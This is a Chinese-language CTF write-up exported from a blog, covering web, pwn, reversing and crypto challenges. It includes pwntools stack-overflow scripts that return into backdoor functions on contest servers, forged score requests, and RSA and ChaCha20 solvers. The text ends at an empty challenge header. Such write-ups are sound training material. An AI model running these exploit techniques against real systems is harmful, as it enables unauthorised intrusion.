{"id":143,"date":"2026-05-31T21:43:21","date_gmt":"2026-05-31T13:43:21","guid":{"rendered":"https:\/\/www.finalequill.com\/?p=143"},"modified":"2026-05-31T21:43:21","modified_gmt":"2026-05-31T13:43:21","slug":"2026yuwangbei","status":"publish","type":"post","link":"https:\/\/www.finalequill.com\/index.php\/2026\/05\/31\/2026yuwangbei\/","title":{"rendered":"2026\u5fa1\u7f51\u676fwp"},"content":{"rendered":"

\u788e\u788e\u5ff5<\/h2>\n

\u8fd9\u662f\u6211\u521d\u5b66CTF\u6253\u7684\u9898\u76ee\u6700\u591a\u7684\u4e00\u4e2a\u6bd4\u8d5b\uff08\u4f46\u662f\u662f\u7531\u961f\u53cb\u5e26\u98de\u548cAI\u795e\u529b\uff09\uff0c\u4e4b\u524d\u7684CISCN\u548c\u84dd\u6865\u676f\u505a\u51fa\u7684\u9898\u76ee\u90fd\u592a\u5c11\uff0c\u5b8c\u5168\u4e0d\u77e5\u9053\u4e13\u95e8\u53d1\u535a\u5ba2\uff08\u8bf4\u767d\u4e86\u6211\u592a\u83dc\uff09\u3002
\n\u4e0d\u8fc7\u8fd9\u7bc7wp\u91cc\u9762\u7edd\u5927\u90e8\u5206\u5185\u5bb9\u6211\u8fd8\u662f\u770b\u4e0d\u61c2~~~ \u5e0c\u671b\u4ee5\u540e\u80fd\u90fd\u61c2\u5427……<\/p>\n

WEB-Snake_Game<\/h2>\n

\u9898\u76ee\u622a\u56fe<\/h3>\n

\"Pasted<\/div><\/p>\n

\u6839\u636e\u63d0\u793a\u4fe1\u606f\uff0c\u6211\u4eec\u5f97\u5230300\u5206\u5373\u53ef\u83b7\u53d6flag\u3002
\n\u6309F12\u67e5\u770b\u524d\u7aef\u4ee3\u7801\uff0c\u53d1\u73b0checkWin(s)<\/code>\u51fd\u6570\uff1a<\/p>\n

function checkWin(s) {\n            let formData = new FormData();\n            formData.append('score', s);\n            fetch('index.php', { method: 'POST', body: formData })\n            .then(r => r.json())\n            .then(data => {\n                let msgEl = document.getElementById('msg');\n                if(data.status === 'success') {\n                    msgEl.style.color = '#2ecc71';\n                    msgEl.innerText = data.flag;\n                } else {\n                    msgEl.style.color = '#e74c3c';\n                    msgEl.innerText = \"Game Over! \" + data.message;\n                }\n            });\n        }<\/code><\/pre>\n
\u5176\u4e2d\uff0c\u5b83\u5411\u540e\u7aefindex.php<\/code>\u8def\u7531\u53d1\u9001\u4e86\u4e00\u4e2a\u5e26\u6709score<\/code>\u7684POST\u8bf7\u6c42\u3002\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u624b\u52a8\u53d1\u9001\u8bf7\u6c42\uff0c\u5e76\u8ba9score<\/code>\u8db3\u591f\u9ad8\u3002
\n
\"Pasted<\/div><\/p>\n
PWN-Authenticate<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u4f7f\u7528IDA\u9006\u5411\u9898\u76ee\u9644\u4ef6\uff0c\u5728login<\/code>\u51fd\u6570\u4e2d\u53d1\u73b0\u4f7f\u7528\u4e86\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u7684gets()<\/code>\u51fd\u6570\uff0c\u4e14\u5b58\u5728backdoor<\/code>\u540e\u95e8\u51fd\u6570\u3002\u56e0\u6b64\u8fde\u63a5\u9776\u673a\uff0c\u586b\u5145 0x80+8 \u4e2a\u5b57\u7b26\u540e\u586b\u5165backdoor+5<\/code>\u5730\u5740\uff080x4011FB\uff09\uff08\u8d8a\u8fc7push rbp\u907f\u514d\u6808\u6307\u9488\u9519\u4f4d\uff09\uff0c\u5373\u53efgetshell\u3002<\/p>\n
from pwn import *\n\nsh = remote('120.27.146.76', 28517)\n\npad = 0x88\ntarget = 0x4011FB\n\nsh.sendline(b'awa')\nsh.sendline(b'a' * pad + p64(target))\n\nsh.interactive()<\/code><\/pre>\n
\"Pasted<\/div><\/p>\n
PWN-NoteService<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u5c06vuln\u6587\u4ef6\u7528IDA\u5206\u6790\uff0c\u6ce8\u610f\u5230read\u51fd\u6570\u53ef\u63a5\u53d7\u7684\u957f\u5ea6\u8fdc\u5927\u4e8ebuf\uff080x100 > 64\uff09\uff0c\u4e14\u5b58\u5728\u540e\u95e8\u51fd\u6570secret_note<\/code>\uff0c\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\u3002
\n\u586b\u5165 0x48 \u5783\u573e\u6570\u636e\u540e\u53d1\u9001secret_note+5<\/code>\u5373\u53ef\uff08\u907f\u514d\u6808\u6307\u9488\u9519\u4f4d\uff09\u3002<\/p>\n
from pwn import *\n\nsh = remote('47.99.147.34', 21314)\n\ntarget = 0x40119B\npad = 0x48\n\nsh.sendline(b'a' * pad + p64(target))\nsh.interactive()<\/code><\/pre>\n
\"Pasted<\/div><\/p>\n
rerere<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u8fd0\u884c\u6587\u4ef6\uff0c\u53d1\u73b0\u8981\u6c42\u8f93\u5165\u4e00\u6bb5\u6587\u672c\uff0c\u968f\u4fbf\u8f93\u5165\u4e00\u4e9b\u540e\u8f93\u51faWrong!<\/code>\u5e76\u9000\u51fa\u3002
\nIDA\u5206\u6790\u6587\u4ef6\uff0c\u67e5\u627e\u5b57\u7b26\u4e32Wrong!<\/code>\u5e76\u5728IDA View\u4e2d\u6253\u5f00\uff0c\u5bfb\u627eDATA XREF\u5f15\u7528\uff0c\u5b9a\u4f4d\u5230\u51fd\u6570sub_1400014FB<\/code>\u3002\u7b80\u5355\u5206\u6790\u53ef\u53d1\u73b0\uff0c\u9664\u53bbn<\/code>\u5916\uff0cflag\u957f\u5ea6\u4e3a38\u3002\u5728\u8f93\u51faCorrect\u7684if\u5206\u652f\u6761\u4ef6\u91cc\u627e\u5230check<\/code>\u51fd\u6570\uff0c\u5b83\u5c06\u8f93\u5165\u4e0e\u53e6\u4e00\u6bb5\u6570\u636ekey\u6309\u4f4d\u6a218\u5f02\u6216\uff0c\u5e76\u5c06\u5f97\u5230\u7684\u503c\u4f5c\u4e3a\u4e0b\u6807\u7d22\u5f15\u53d6\u53e6\u4e00\u5927\u6bb5\u6570\u636e\u5185\u7684\u6570\u636e\uff0c\u62fc\u5728\u4e00\u8d77\u5f97\u5230\u4e00\u6bb5\u5bc6\u6587\u3002
\n\u56e0\u6b64\u601d\u8def\u53ef\u4ee5\u660e\u786e\uff1a\u5148\u5c06\u5bc6\u6587\u4e2d\u7684\u6bcf\u4e00\u4e2a\u5b57\u8282\u6309\u4f4d\u5bf9\u5e94\u627e\u5230\u76f8\u5e94\u4e0b\u6807\uff0c\u518d\u5c06\u6240\u6709\u4e0b\u6807\u4e0ekey\u6309\u4f4d\u6a218\u5f02\u6216\uff0c\u5373\u53ef\u5f97\u5230\u539f\u6587\u3002<\/p>\n
mapping = '''C2 23 97 49 83 F6 D3 A7  EB BF 78 C3 29 56 D2 1A\n13 BC 21 6A 37 8E 5F 0C  B4 46 DE E4 6C A2 66 30\n0F A4 BB 8C 09 4B 3D 32  42 55 2D 4F F9 77 1B 74\n1F 71 7B 9D 73 C4 AB D0  F3 C1 88 07 DC CE EF C0\n72 4A 27 81 9B EE C7 28  26 5A 94 54 70 D1 E9 C8\n98 36 91 41 B8 3A 79 0A  08 E5 AF 80 24 AE 00 19\nCC 7A F7 51 7D 69 EC 03  65 25 1C 01 F5 E6 BD D9\n59 FE 92 B0 10 6F F0 E3  9F AD 84 F4 A5 33 35 48\n53 B1 E0 D8 05 38 18 68  A9 14 C6 3F 61 8A 31 3B\nBA 2B 4E E2 57 9A F1 EA  64 7E A0 93 B6 DA 60 2E\n1D 5B 82 34 6D FC CF 7F  E7 96 67 43 06 44 C9 4C\n40 DB FD 4D B5 ED 39 2C  B3 17 9E CD FA 6B CA 87\n8F 9C 89 0E 63 45 86 AA  5E 95 16 C5 D5 2F A1 F8\n99 FF 3C 0D 3E D4 04 76  D7 47 20 8D DF 5C 7C A3\n1E 8B 15 B9 A8 CB 22 A6  52 D6 FB 5D DD B2 6E E8\nF2 E1 2A 58 62 12 11 50  75 B7 AC 90 0B 85 02 BE'''.replace(' ', '')\nmapping = bytes.fromhex(mapping)\nprint(mapping)\n\nenc = '''A3 5B 4C 0A 0E C2 33 D5  5C 90 E7 A7 14 3A 84 DA\n31 B7 44 BF C6 3A F9 C5  20 12 AC C2 C6 91 35 64\nA3 62 90 83 53 6C'''.replace(' ', '')\nenc = bytes.fromhex(enc)\n\nkey = 'B9 CD CE 30 B8 61 4E AA'.replace(' ', '')\nkey = bytes.fromhex(key)\n\nindexes = []\nfor b in enc:\n    print(b)\n    indexes.append(mapping.index(b.to_bytes(1)))\n\nprint(indexes)\n\nfinal = ''\nv2 = 0\nfor i in indexes:\n    final += chr(i ^ (key[v2 % 8]))\n    v2 += 1\n\nprint(final)<\/code><\/pre>\n
\"Pasted<\/div><\/p>\n
\u5b57\u8282\u7801\u8ff7\u8e2a<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u76f4\u63a5\u9006\u5411pyc\u6587\u4ef6\uff0c\u5f97\u5230\u90e8\u5206\u6e90\u7801\uff1a<\/p>\n
#!\/usr\/bin\/env python\nimport base64\n\ndef decrypt_flag(encoded_data, key):\n    pass\n# WARNING: Decompyle incomplete\n\ndef main():\n    encoded_flag = 'cHp3cW18ZCZ+JScuejtyZmN3O2MuY2I7ensjJDtieGNsYCVycXt6Z3Rr'\n    xor_key = 22\n    user_input = input('\u8bf7\u8f93\u5165flag: ').strip()\n    correct_flag = decrypt_flag(encoded_flag, xor_key)\n    if user_input == correct_flag:\n        print('\u6b63\u786e\uff01')\n        return None\n    print('\u9519\u8bef\uff01')\n\nif __name__ == '__main__':\n    main()\n    return None<\/code><\/pre>\n
decrypt_flag<\/code>\u51fd\u6570\u5e76\u6ca1\u6709\u9006\u5411\u51fa\u6765\uff0c\u4f46\u6839\u636e\u53d8\u91cf\u540d\u53ef\u4ee5\u731c\u51fa\u662fxor\u52a0\u5bc6\uff0c\u5bc6\u94a522\uff080x16\uff09\uff0c\u800cencoded_flag<\/code>\u5b58\u5728+<\/code>\u53f7\uff0c\u7591\u4f3cBase64\u5b57\u7b26\u4e32\u3002\u89e3\u5bc6\u5f97\u5230flag\u3002<\/p>\n
import base64\n\nenc = 'cHp3cW18ZCZ+JScuejtyZmN3O2MuY2I7ensjJDtieGNsYCVycXt6Z3Rr'\nenc = base64.b64decode(enc)\n\nkey = 22\n\nfor i in enc:\n    print((i ^ key).to_bytes(1).decode(), end='')<\/code><\/pre>\n
\"Pasted<\/div><\/p>\n
DES\u52a0\u5bc6\u9a8c\u8bc1<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u5c06\u9644\u4ef6\u4f7f\u7528jadx\u5206\u6790\uff0c\u5728MainActivity\u4e2d\u53d1\u73b0\u4f7f\u7528\u53cd\u5c04\u52a8\u6001\u52a0\u8f7d\u4e86com.cr.test.wide\u7c7b\uff0c\u4ece\u4e2d\u627e\u5230\u4e86verify<\/code>\u51fd\u6570\u3002\u51fd\u6570\u8c03\u7528\u4e86verifyFlag(String str)<\/code> native\u65b9\u6cd5\uff0c\u56e0\u6b64\u4ecejnilib\u4e2d\u5bfb\u627e\u9a8c\u8bc1\u51fd\u6570\u3002
\n\u5c06so\u6587\u4ef6\u7528ida\u5206\u6790\uff0c\u901a\u8fc7OnLoad\u627e\u5230\u52a8\u6001\u52a0\u8f7d\u51fd\u6570\u8868\uff0c\u627e\u5230verifyFlag<\/code>\u51fd\u6570\u3002\u7ecf\u8fc7\u5206\u6790\uff0c\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u5148\u8fdb\u884c\u4e00\u6b21PCKS7\u586b\u5145\uff0c\u540e\u88ab\u7528\u4e8eDES\u52a0\u5bc6\uff0c\u4f46\u52a0\u5bc6\u7684\u7ed3\u679c\u5e76\u6ca1\u6709\u88ab\u4f7f\u7528<\/strong>\uff0c\u800c\u662f\u76f4\u63a5\u5c06\u586b\u5145\u540e\u7684\u5b57\u7b26\u4e32\u8f6chex\u5b58\u50a8\u3002\u56e0\u6b64\u53ef\u9006\u5411flag\u3002<\/p>\n
\"Pasted<\/div><\/p>\n
\u5e7b\u5f71<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u5f97\u5230data.bin\u6587\u4ef6,\u7528010editor\u67e5\u770b16\u8fdb\u5236\uff0c\u53d1\u73b0\u63d0\u793a\u8fdb\u884c\u4e86base64\u548c\u5f02\u6216
\n\u63a8\u6d4b\u4e0b\u9762\u90e8\u5206\u4f4d\u52a0\u5bc6\u540e\u7ed3\u679c<\/p>\n
Nz0wNio1MmVmYTJhaHw1ZzQyfGU1ZjJ8aDIwZ3wwaWRjYmRiNGJlMzMs<\/code><\/pre>\n
\"Pasted<\/div>
\nbase64\u89e3\u5bc6\u5f97\u52307=0\u5f00\u5934\uff0c\u5bf9\u5e9416\u8fdb\u523637 3D 30\uff0c\u7531\u5f02\u6216\u7684\u539f\u7406\uff08A ^ B = C<\/code> \u5219 A ^ C = B<\/code>\uff09\u548c\u7ed3\u679c\u4f4df\u5f00\u5934\u63a8\u6d4b\uff0c0x37 ^ 0x66 = 0x51\uff0c\u63a8\u6d4b\u5f02\u6216\u6570\u5b57\u4f4d0x51
\n\u7528cyberchef\u5f97\u5230flag
\n
\"Pasted<\/div><\/p>\n
\u7b7e\u5230\u9898-\u635f\u574f\u7684\u538b\u7f29\u5305<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u5f97\u5230\u4e2atxt\u6587\u4ef6\uff0c\u5185\u5bb9\uff1a<\/p>\n
bmR0Zw==<\/code><\/pre>\n
\u7528cyberchef\u6765base64\u89e3\u5bc6\u5f97\u5230flag( \u8865\u5168flag\u548c{})
\n
\"Pasted<\/div><\/p>\n
\u8ff7\u5bab<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u6253\u5f00\u6587\u4ef6\uff0c\u6700\u7ec8\u5f97\u5230vault.bin\u6587\u4ef6\uff0c\u7528010editor\u6253\u5f00
\n
\"Pasted<\/div>
\nbase64\u89e3\u5bc6\uff0c\u7528cyberchef\uff0c\u8865\u5168flag<\/p>\n
\"Pasted<\/div><\/p>\n
babyRSA<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u5f97\u5230output\u548ctask.py\u4ee3\u7801
\n\u57fa\u7840RSA\uff0c\u76f4\u63a5\u7ed9python\u811a\u672c<\/p>\n
from Crypto.Util.number import long_to_bytes  \n\nn = 119462420784154105287477907338687314148748680087062818596679748019039874463028245176436697023028139386911200014457634920585600705258627806780412113594113427042570622210385728200137718026136892943193293629041610913603165173168203542499119014715006667033837430631135192669531260141856380589300121127571331140647  \ne = 3  \nc = 2217344750798484326817212181921397010209057560599949572118805610572489689091481005306684821038929111122282814090181724832846969082741139590693697098487985460761901508186753252919647300276269339282712874683171961658223852440260976026280149180616107949832622420023125006244197  \n\ndef integer_cbrt(n):  \n    low = 1  \n    high = n  \n    while low < high:  \n        mid = (low + high) \/\/ 2  \n        if mid**3 < n:  \n            low = mid + 1  \n        else:  \n            high = mid  \n    return low  \n\nm = integer_cbrt(c)  \n\nif m**3 == c:\n    flag = long_to_bytes(m)  \n    print(\"Flag: \", flag.decode('utf-8'))<\/code><\/pre>\n
\u5f97\u5230flag
\n
\"Pasted<\/div><\/p>\n
ScatterRSA10<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u4ece\u6587\u4ef6\u4e2d\u5f97\u5230task.py\u548coutput.txt<\/p>\n
\u8fd9\u9053\u9898\u662f\u6781\u5176\u7ecf\u5178\u7684 RSA \u7ebf\u6027\u586b\u5145\u5e7f\u64ad\u653b\u51fb\uff08Hastad’s Broadcast Attack\uff09\u3002<\/p>\n
\u9898\u76ee\u628a\u540c\u4e00\u4e2a\u660e\u6587 Flag\uff0c\u7ecf\u8fc7\u4e86 3 \u6b21\u4e0d\u540c\u7684\u968f\u673a\u52a0\u566a\u5904\u7406\uff08$a cdot m + b$\uff09\uff0c\u7136\u540e\u7528\u76f8\u540c\u7684\u6781\u5c0f\u516c\u94a5\u6307\u6570 $e = 3$<\/strong> \u8fdb\u884c\u4e86 3 \u6b21 RSA \u52a0\u5bc6\u3002<\/p>\n
\u867d\u7136\u52a0\u5165\u4e86 $a$ \u548c $b$ \u7684\u5e72\u6270\uff0c\u4f46\u56e0\u4e3a\u516c\u94a5\u6307\u6570 $e=3$ \u5b9e\u5728\u662f\u592a\u5c0f\u4e86\uff0c\u800c\u4e14\u6211\u4eec\u624b\u63e1 3 \u7ec4\u4e0d\u540c\u7684\u5bc6\u6587\u548c\u6a21\u6570\uff08$n_1, n_2, n_3$\uff09\u3002\u8fd9\u610f\u5473\u7740\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u4e2d\u56fd\u5269\u4f59\u5b9a\u7406\uff08CRT\uff09\u628a\u8fd9 3 \u4e2a\u52a0\u5bc6\u65b9\u7a0b\u878d\u5408\u6210\u4e00\u4e2a\u5de8\u5927\u7684\u65b9\u7a0b\u3002\u5728\u8fd9\u4e2a\u5de8\u578b\u65b9\u7a0b\u91cc\uff0c\u6211\u4eec\u8981\u627e\u7684 Flag \u957f\u5ea6\u76f8\u5bf9\u4e8e\u65b9\u7a0b\u7684\u89c4\u6a21\u6765\u8bf4\u975e\u5e38\u5c0f\uff0c\u8fd9\u5c31\u6ee1\u8db3\u4e86 Coppersmith \u5b9a\u7406<\/strong> \u7684\u6c42\u89e3\u6761\u4ef6\uff0c\u53ef\u4ee5\u76f4\u63a5\u51fa\u7b54\u6848\u3002<\/p>\n
\u5229\u7528\u5df2\u77e5\u53c2\u6570\uff0c\u5c06 3 \u4e2a\u4fe1\u9053\u7684\u52a0\u5bc6\u65b9\u7a0b\u5206\u522b\u6539\u5199\u4e3a\u4ee5 $x^3$ \u5f00\u5934\u7684\u6807\u51c6\u591a\u9879\u5f0f\u3002\u4f7f\u7528 CRT\uff0c\u628a\u8fd9 3 \u4e2a\u72ec\u7acb\u591a\u9879\u5f0f\u7684\u7cfb\u6570\u878d\u5408\u6210\u4e00\u4e2a\u6a21 $N$\uff08$N = n_1 cdot n_2 cdot n_3$\uff09\u7684\u5168\u5c40\u591a\u9879\u5f0f\u3002
\n\u5c06\u5408\u5e76\u540e\u7684\u591a\u9879\u5f0f\u653e\u8fdb SageMath \u73af\u5883\u4e2d\uff0c\u76f4\u63a5\u8c03\u7528\u5185\u7f6e\u7684 .small_roots()<\/code> \u81ea\u52a8\u6c42\u89e3\u51fa\u4ee3\u8868 Flag \u6574\u6570\u503c\u7684 $m$\u3002\u5c06\u5f97\u5230\u7684\u957f\u6574\u6570 $m$ \u8f6c\u6362\u56de\u5341\u516d\u8fdb\u5236\uff0c\u518d\u7ffb\u8bd1\u6210\u5e38\u89c4\u5b57\u7b26\u4e32<\/p>\n
\u4f7f\u7528\u5728\u7ebf\u5e73\u53f0\u8fd0\u884csage\u4ee3\u7801   sagecell.sagemath.org<\/p>\n
n1 = 78081870337844414151241100305158826036375259465973937152030168481472074627679922817572311521252935997797052713882730821458948887248271287486322664809111447767214849959631852414688303170071807154156181079411302069530277397488939107857192997361132976176030487000445122823976567397443528813759208405977421005221\na1 = 187123381335987084337749097513339776382\nb1 = 97209934871826592730509592795116155578419009399702491386475812956341303721955\nc1 = 14123478097555544583040915650622954051865393647452672192119376894613088319670171524620165803687113853287440124300534523915757452838191529401351103434081352612662863012249389885160910664649407564203742220725280677270280439758021531155314255114762144862618860795080828651022096534091658229812919874812038277765\n\nn2 = 151298592284001160632170405845753959036244653410892577293430940404341362490681866811415774669776195998526885548860876628647806811333915771852617451974282503276734816183085207960566719048869313969576061706357425836858627350032928726041836856560590797190119412160618944863771627536132838876605883991970892962193\na2 = 255028239960364829019667959380443332639\nb2 = 75168460615495162386855776280390548051362095782752087871619896408940387062248\nc2 = 147458755573177812766535997252156093328108537370116815674293282928365573512879441899814507479182611225079060254576242105206605583257270697125272066345762421410211017283262151880295537520725338228346626840605498567485989997707003616168214508795014149221418862470567239522513586735123900093358395338873917731365\n\nn3 = 123780523634252096831680175316357288442265880579703275997478211251677743044096940923671388596333127526795194955612937986046444715991687899935054199805982269720064313957492856004199361000831620913715613106431607539983125960124285449295999239150639249585185515802154914674109087962005299156068008961415619788389\na3 = 170648777349710569773110487741653328136\nb3 = 101656356358739203413100846765861840472115679906812525745896505745960127967887\nc3 = 53415312813469381910901019087411336867228073148904651325937527207519414663703187305012971839144832933909714678630249138922137182970593182398234687600925206853876533503578712580071267901698423210441011509820482418257689331627293315735686036309282160156985499818089798596867969353597661163154295571213437645132\n\nN = n1 * n2 * n3\n\ninv_a1 = inverse_mod(a1, n1)\nc2_1 = (3 * b1 * inv_a1) % n1\nc1_1 = (3 * pow(b1 * inv_a1, 2, n1)) % n1\nc0_1 = ((pow(b1, 3, n1) - c1) * pow(inv_a1, 3, n1)) % n1\n\ninv_a2 = inverse_mod(a2, n2)\nc2_2 = (3 * b2 * inv_a2) % n2\nc1_2 = (3 * pow(b2 * inv_a2, 2, n2)) % n2\nc0_2 = ((pow(b2, 3, n2) - c2) * pow(inv_a2, 3, n2)) % n2\n\ninv_a3 = inverse_mod(a3, n3)\nc2_3 = (3 * b3 * inv_a3) % n3\nc1_3 = (3 * pow(b3 * inv_a3, 2, n3)) % n3\nc0_3 = ((pow(b3, 3, n3) - c3) * pow(inv_a3, 3, n3)) % n3\n\nC2 = crt([c2_1, c2_2, c2_3], [n1, n2, n3])\nC1 = crt([c1_1, c1_2, c1_3], [n1, n2, n3])\nC0 = crt([c0_1, c0_2, c0_3], [n1, n2, n3])\n\nP.<x> = PolynomialRing(Zmod(N))\nf = x^3 + C2*x^2 + C1*x + C0\n\nprint(\"LLL...\")\nroots = f.small_roots(X=2^512, beta=1)\n\nif roots:\n    m = int(roots[0])\n\n    hex_str = hex(m)[2:]\n    if len(hex_str) % 2 != 0:\n        hex_str = '0' + hex_str\n\n    try:\n        flag = bytes.fromhex(hex_str).decode('utf-8')\n        print(\"Flag: \", flag)\n    except Exception as e:\n        print(hex_str)\nelse:\n    print(\"nothing\")<\/code><\/pre>\n
ChaCha20<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
\"Pasted<\/div><\/p>\n
\u89e3\u9898\u601d\u8def<\/h3>\n
\u7528 IDA \u6253\u5f00 SO \u6587\u4ef6\uff0c\u7531\u4e8e\u6839\u636e\u9898\u610f\u5f97\u77e5\u6d41\u5bc6\u7801\uff0c\u9996\u5148\u8003\u8651\u901a\u8fc7\u7b97\u6cd5\u7684\u7279\u5f81\u7acb\u5373\u6570\u8fdb\u884c\u5b9a\u4f4d\u3002<\/p>\n
ChaCha20 \u7b97\u6cd5\u5728\u521d\u59cb\u5316\u5176 $4 times 4$ \u77e9\u9635\u65f6\uff0c\u5fc5\u7136\u4f1a\u5c06\u56fa\u5b9a\u5e38\u91cf\u5b57\u7b26\u4e32\u5207\u5206\u4e3a 4 \u4e2a 32 \u4f4d\u7684\u6574\u6570\u586b\u5165\u77e9\u9635\u7684\u524d 16 \u4e2a\u5b57\u8282 \u3002<\/p>\n
\u5728 IDA \u4e2d\u4f7f\u7528 Search<\/code> -> Immediate value<\/code> \u5168\u5c40\u68c0\u7d22\u5e38\u6570 0x61707865<\/code><\/strong>\uff08\u5373\u5b57\u7b26\u4e32 expand 32-byte k<\/code> \u7684\u524d\u56db\u4e2a\u5b57\u8282\u5c0f\u7aef\u5e8f\uff09 \u3002<\/p>\n
\u53cc\u51fb\u68c0\u7d22\u7ed3\u679c\uff0c\u52a0\u5bc6\u51fd\u6570 sub_26CC0<\/code><\/strong> \u4e3aChaCha20\u52a0\u5bc6\u7b97\u6cd5\u3002
\n\u5728 sub_26CC0<\/code> \u51fd\u6570\u540d\u4e0a\u6309\u5feb\u6377\u952e X<\/code> \u67e5\u770b\u4ea4\u53c9\u5f15\u7528\uff0c\u8ffd\u6eaf\u5230\u5176\u4e0a\u5c42\u5305\u88c5\u51fd\u6570 sub_25740<\/code><\/strong> \u3002<\/p>\n
unk_F2E1<\/code><\/strong> \uff1a\u8df3\u8f6c\u5230\u8be5\u5185\u5b58\u5730\u5740\uff0c\u63d0\u53d6\u51fa\u786c\u7f16\u7801\u7684\u8fde\u7eed 32 \u5b57\u8282\u5341\u516d\u8fdb\u5236\u6570\u636e\uff1a149263A16F2D89CBF0375B1CA94E78D3226017EE9ABC4D0853E1762A8DC4903F<\/code>
\nunk_F301<\/code><\/strong> \uff1a\u8df3\u8f6c\u63d0\u53d6\u51fa\u8fde\u7eed 12 \u5b57\u8282\u5341\u516d\u8fdb\u5236\u6570\u636e\uff1a44332211ABCDEF668899AA55<\/code><\/p>\n
\u7ee7\u7eed\u5bf9 sub_25740<\/code> \u5411\u4e0a\u8ffd\u6eaf\uff0c\u6700\u7ec8\u6765\u5230\u5916\u5c42\u9a8c\u8bc1\u51fd\u6570 sub_25330<\/code> \u3002 \u5728 sub_25330<\/code> \u4e2d\uff0c\u7a0b\u5e8f\u5728\u52a0\u5bc6\u5b8c\u6210\u540e\u8c03\u7528\u4e86\u5b57\u7b26\u8868 123456789abcdef<\/code>\uff0c\u8bf4\u660e\u5f02\u6216\u540e\u7684\u4e8c\u8fdb\u5236\u5bc6\u94a5\u6d41\u7ed3\u679c\u88ab\u8f6c\u5316\u4e3a\u4e86\u53ef\u89c1\u7684 Hex \u5b57\u7b26\u4e32 \u3002\u800c\u5728\u4e4b\u540e\u7684 for<\/code> \u5faa\u73af\u6bd4\u5bf9\u4e2d\uff0c\u7a0b\u5e8f\u5c06\u751f\u6210\u7684 Hex \u4e0e\u786c\u7f16\u7801\u7684\u76ee\u6807\u6570\u636e\u8fdb\u884c\u4e86\u9010\u4f4d\u6821\u9a8c \u3002<\/p>\n
\u5728\u5bfc\u51fa\u7684\u6570\u636e\u6bb5 .rodata<\/code> \u4e2d\uff0c\u5728\u76f8\u5bf9\u5e94\u7684\u504f\u7f6e\u4f4d\u7f6e\u6210\u529f\u5265\u79bb\u51fa\u51fa\u9898\u4eba\u5199\u6b7b\u7684\u6700\u7ec8 Hex \u5bc6\u6587\u5b57\u7b26\u4e32\uff1a<\/p>\n
d097c3f6d2238172e871ee74bca5859f88178f6e<\/code><\/p>\n
\u5728\u7f16\u5199\u89e3\u5bc6\u811a\u672c\u65f6\u6d89\u53ca\u4e00\u4e2a\u6781\u5176\u9690\u853d\u7684\u672c\u5730\u5751\u70b9\uff1a\u5728\u4e0a\u5c42\u51fd\u6570 sub_25740<\/code> \u4e2d\uff0c\u7a0b\u5e8f\u521d\u59cb\u5316\u7684\u8ba1\u6570\u5668\u53d8\u91cf\u88ab\u63a7\u5236\u4e3a v10 = 1;<\/code>\uff0c\u5e76\u4e14\u968f\u540e\u5728\u8c03\u7528\u6838\u5fc3\u5f15\u64ce\u65f6\u6267\u884c sub_26CC0(v7, v10++, ...)<\/code> \u3002\u8fd9\u610f\u5473\u7740 SO \u5c42\u5b9e\u73b0\u7684 ChaCha20 \u5757\u8ba1\u6570\u5668\uff08Counter\uff09\u662f\u4ece 1<\/strong> \u5f00\u59cb\u9012\u589e\u8ba1\u7b97\u7684\uff0c\u800c\u975e\u6807\u51c6\u5bc6\u7801\u5b66\u5e93\u9ed8\u8ba4\u7684 0 \u3002<\/p>\n
\u4e3a\u4e86\u5728 Python \u4e2d\u5bf9\u9f50\u8fd9\u79cd\u7279\u6b8a\u7684\u5185\u90e8\u72b6\u6001\uff0c\u89e3\u5bc6\u524d\u9700\u8981\u5148\u8ba9\u5bc6\u7801\u5668\u53bb\u89e3\u5bc6 64 \u4e2a\u7a7a\u5b57\u8282\uff08\u5373 1 \u4e2a Block \u957f\u5ea6\uff09\uff0c\u5f3a\u884c\u5c06\u5185\u90e8\u7684 Counter \u72b6\u6001\u63a8\u8fdb\u5230 1\uff0c\u7136\u540e\u518d\u4f20\u5165\u771f\u6b63\u7684\u5bc6\u6587\u8fdb\u884c\u89e3\u5bc6 \u3002<\/p>\n
from Crypto.Cipher import ChaCha20  \n\nkey = bytes.fromhex(\"149263A16F2D89CBF0375B1CA94E78D3226017EE9ABC4D0853E1762A8DC4903F\")\nnonce = bytes.fromhex(\"44332211ABCDEF668899AA55\")  \n\nciphertext_hex = \"d097c3f6d2238172e871ee74bca5859f88178f6e\"  \nciphertext = bytes.fromhex(ciphertext_hex)  \n\ncipher = ChaCha20.new(key=key, nonce=nonce)\ncipher.decrypt(b'x00' * 64)\nplaintext = cipher.decrypt(ciphertext)\nprint(plaintext.decode('utf-8', errors='ignore'))<\/code><\/pre>\n
\"Pasted<\/div><\/p>\n
WEB-Enterprise_OA<\/h2>\n
\u9898\u76ee\u622a\u56fe<\/h3>\n
